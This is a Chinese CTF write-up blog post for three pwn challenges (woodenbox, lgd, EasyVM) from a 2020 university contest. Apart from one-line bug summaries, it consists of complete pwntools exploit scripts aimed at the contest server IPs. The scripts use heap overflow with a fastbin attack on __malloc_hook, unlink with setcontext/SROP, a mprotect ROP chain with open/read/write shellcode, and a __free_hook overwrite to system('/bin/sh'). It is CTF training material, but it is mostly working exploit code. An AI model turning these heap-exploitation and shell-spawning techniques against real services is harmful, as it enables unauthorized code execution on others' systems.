高校战“疫”网络安全分享赛部分wp

March 9, 2020 CTF-Writeup 访问: 28 次

woodenbox

edit的时候重新输入的size没有限制,可造成堆溢出,然后fastbin attack更改malloc_hookone_gg即可

exp:

from pwn import *
import sys
context.log_level='debug'
debug = 1
file_name = './woodenbox2'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = ''
prot = ''
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
def add(chunk_size,value):
    ru('Your choice:')
    sl('1')
    ru('Please enter the length of item name:')
    sl(str(chunk_size))
    ru('Please enter the name of item:')
    sl(value)
def delete(index):
    ru('Your choice:')
    sl('3')
    ru('Please enter the index of item:')
    sl(str(index))
def edit(index,len,value):
    ru('Your choice:')
    sl('2')
    ru('Please enter the index of item:')
    sl(str(index))
    ru("Please enter the length of item name:")
    sl(str(len))
    ru("Please enter the new name of the item:")
    sd(value)
def debug():
    gdb.attach(r)
    raw_input()
r.close()

while True:
    try:
        r = remote("121.36.215.224",9998)#process("./woodenbox2")
        add(0x68,"aaa")
        add(0x58,"aaa")
        add(0x68,"aaa")
        add(0x68,"aaa")
        add(0x10,"bbbb")
        edit(0,0x70,"a"*0x68+p64(0xd1))
        delete(2)
        delete(0)
        add(0x58,"ccc")
        pay = "a"*0x58+p64(0x71)+"\xdd\x15"
        edit(0,len(pay),pay)
        add(0x68,"aaa")
        add(0x68,"111")
        pay = "111"+p64(0)*6+p64(0xfbad1800)+p64(0)*3+"\x00"
        edit(4,len(pay),pay)
        r.recvuntil("\x7f")
        r.recv(2)
        libc_base = u64(r.recv(8))-0x3c56a3
        li("libc_base",libc_base)
        malloc_hook = libc_base + libc.symbols['__malloc_hook']
        add(0x68,"1111")
        add(0x68,"1111")
        add(0x10,"1111")
        delete(6)
        pay = "a"*0x18+p64(0x71)+p64(malloc_hook-0x13)
        edit(1,len(pay),pay)
        add(0x68,"1111")
        one_gg =0xf02a4+libc_base
        pay = 'a' * 3 + p64(one_gg)
        add(0x68,pay)
        li("one_gg",one_gg)
        # ru('Your choice:')
        # sl('1')
        # ru('Please enter the length of item name:')
        delete(2)
        delete(3)
        # debug()
        ri()
    except EOFError:
        r.close()
'''
0x7f00e0c215dd
0x7f00e0c20b78
0x3ac5c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3ac5e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3ac62 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3ac69 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5fbc5 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5fbc6 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL
'''

lgd

这道题其实是一个纸老虎,每个函数有很复杂的流程,但是经过测试发现,那些流程其实没什么用

测试发现,add的时候,输入的长度就是edit时可以输入的长度,可以造成堆溢出,然后unlink控制heap_list即可,由于程序存在沙箱,最后获取flag的时候要用open、read、write来读出来

exp:

from pwn import *
#author:萝卜
import sys
context.arch = 'amd64'
context.log_level='debug'
debug = 0
file_name = './pwn'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = '121.36.209.145'
prot = '9998'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
def add(chunk_size,value):
    ru('>> ')
    sl('1')
    ru('______?')
    sl(str(chunk_size))
    ru('start_the_game,yes_or_no?')
    sl(value)
def delete(index):
    ru('>> ')
    sl('2')
    ru('index ?')
    sl(str(index))
def show(index):
    ru('>> ')
    sl('3')
    ru('index ?')
    sl(str(index))
def edit(index,value):
    ru('>> ')
    sl('4')
    ru('index ?')
    sl(str(index))
    ru('___c___r__s__++___c___new_content ?')
    sd(value)
def debug():
    gdb.attach(r)
    raw_input()

ru("son call babaaa,what is your name? ")
sl("funcyou")
add(0x68,"a"*0x100)
add(0x68,"a"*0x100)
add(0x80,"a"*0x80)
add(0x200,"a"*0x200)
edit(1,"a"*0x60+p64(0x60)+"\x90")

target_addr=0x0000000006032E8
fd=target_addr - 0x18
bk=target_addr - 0x10
fake_chunk='a'*0x8 # prev_size
# fake_chunk+=p64() # size
fake_chunk+=p64(fd)+p64(bk)
# fake_chunk+='a'* #padding
edit(1,"a"*0x18+p64(bk))
edit(1,"a"*0x10+p64(fd))
edit(1,"a"*0x8+p64(0x61))
delete(2)
edit(1,"a"*0x10+p64(file.got['puts']))
show(0)
aaa = rud("1. fater")
# aaa = rud("\x7f")
# print aaa.encode("hex")
libc_base = u64(aaa[1:7]+"\x00\x00")-libc.symbols['puts']
li("libc_base",libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
free_hook = libc_base + libc.symbols['__free_hook']
setcontext_addr = libc_base + libc.symbols['setcontext']+53
edit(1,"a"*0x10+p64(free_hook))
edit(0,p64(setcontext_addr))
new_area =  free_hook&0xfffffffffffff000
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = new_area #
frame.rdx = 0x2000
frame.rsp = new_area
frame.rip = libc_base + 0x00000000000bc375 #: syscall; ret; 

payload = str(frame)
print payload.encode("hex")
li("len",len(payload))
pop_rdi = libc_base + 0x0000000000021102
pop_rsi = libc_base + 0x00000000000202e8
pop_rdx = libc_base + 0x0000000000001b92
pop_rax = libc_base + 0x0000000000033544
syscall_ret = libc_base + 0x00000000000bc375
jmp_rsp = libc_base + 0x0000000000002a71
#mprotect
m_rop = p64(pop_rdi)
m_rop +=p64(new_area)
m_rop +=p64(pop_rsi)
m_rop +=p64(0x2000)
m_rop +=p64(pop_rdx)
m_rop +=p64(7)
m_rop +=p64(pop_rax)
m_rop +=p64(10)
m_rop +=p64(syscall_ret)
m_rop +=p64(jmp_rsp)
# delete(0)
shellcode = asm('''
        push 0x67616c66
        mov rdi, rsp
        xor esi, esi
        mov eax, 2
        syscall     

        mov edi, eax
        mov rsi, rsp
        mov edx, 0x100
        xor eax, eax
        syscall     

        mov edx, eax
        mov rsi, rsp
        mov edi, 1
        mov eax, edi
        syscall
        ''')
edit(3,payload)
delete(3)
r.send(flat(m_rop) + shellcode)
# debug()
ri()
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

EasyVM

了解过sub_A16功能之后,可以造成任意地址泄露和任意地址修改,修改__free_hook,然后把ptr[10]写上/bin/sh即可
exp:

from pwn import *
import sys
context.log_level='debug'
debug = 0
file_name = './EasyVM'
libc_name = '/lib/i386-linux-gnu/libc.so.6'
ip = '121.36.215.224'
prot = '9999'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
def add(value):
    ru('>>> \n')
    sl('1')
    sl(value)
def delete():
    ru('>>> \n')
    sl('3')

def run():
    ru('>>> \n')
    sl('2')

def gift():
    ru('>>> \n')
    sl("4")

def debug():
    gdb.attach(r)
    raw_input()

var1 = 0x2910
gift()
pay = "\x09\x80\x02\x10\x29\x00\x00\x41\x11\x99"
add(pay)
run()
elf_base = eval(rud("\n"))-file.got['puts']
li("elf_base",elf_base)

setbuf_got = elf_base + file.got['setbuf']

pay = "\x71"+p32(setbuf_got)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"
pay += "\x71"+p32(setbuf_got+1)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"
pay += "\x71"+p32(setbuf_got+2)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"
pay += "\x71"+p32(setbuf_got+3)+"\x76"+"\x00\x00\x00\x00"+"\x53"+"\x00"+"\x99"

add(pay)
run()
a = rud("\xf7")
libc_base = u32(a+"\xf7")-libc.symbols['setbuf']
li("libc_base",libc_base)
malloc_hook = libc_base+libc.symbols['__malloc_hook']
li("malloc_hook",malloc_hook)

b = [0x3ac5c,0x3ac5e,0x3ac62,
0x3ac69,
0x5fbc5,
0x5fbc6]
one_gg = p32(b[4] + libc_base)
# one_gg = p32(0x41414141)


realloc_hook = libc_base+libc.symbols['__realloc_hook']
s_realloc = p32(libc.symbols['realloc']+libc_base)
free_hook = libc_base + libc.symbols['__free_hook']

system = p32(libc.symbols['system']+libc_base)
pay = "\x71"+p32(free_hook)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(free_hook+1)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(free_hook+2)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(free_hook+3)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"+"\x99"

add(pay)
run()
# print a.encode("hex")
sd(str(system[0]))
sleep(0.2)
sd(str(system[1]))
sleep(0.2)
sd(str(system[2]))
sleep(0.2)
sd(str(system[3]))
li("one_gg",0x5fbc6 + libc_base)
'''
pay = "\x71"+p32(malloc_hook)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(malloc_hook+1)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(malloc_hook+2)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"
pay += "\x71"+p32(malloc_hook+3)+"\x76"+"\x00\x00\x00\x00"+"\x54\x00"+"\x99"

add(pay)
run()
sd(str(s_realloc[0]))
sleep(0.2)
sd(str(s_realloc[1]))
sleep(0.2)
sd(str(s_realloc[2]))
sleep(0.2)
sd(str(s_realloc[3]))
'''
for x in range(5+18*4):
    pay = "\x71"+"\xaa\xaa\xaa\xaa"+"\x99"
    add(pay)
    run()
pay = "\x71"+"/sh\x00"+"\x99"
add(pay)
run()
pay = "\x71"+"/bin"+"\x99"
add(pay)
run()
# debug()
delete()
# ru('>>> \n')
# sl('1')
ri()

'''
0x3ac5c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3ac5e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL


 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL


 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL


 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL


 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL  

'''

添加新评论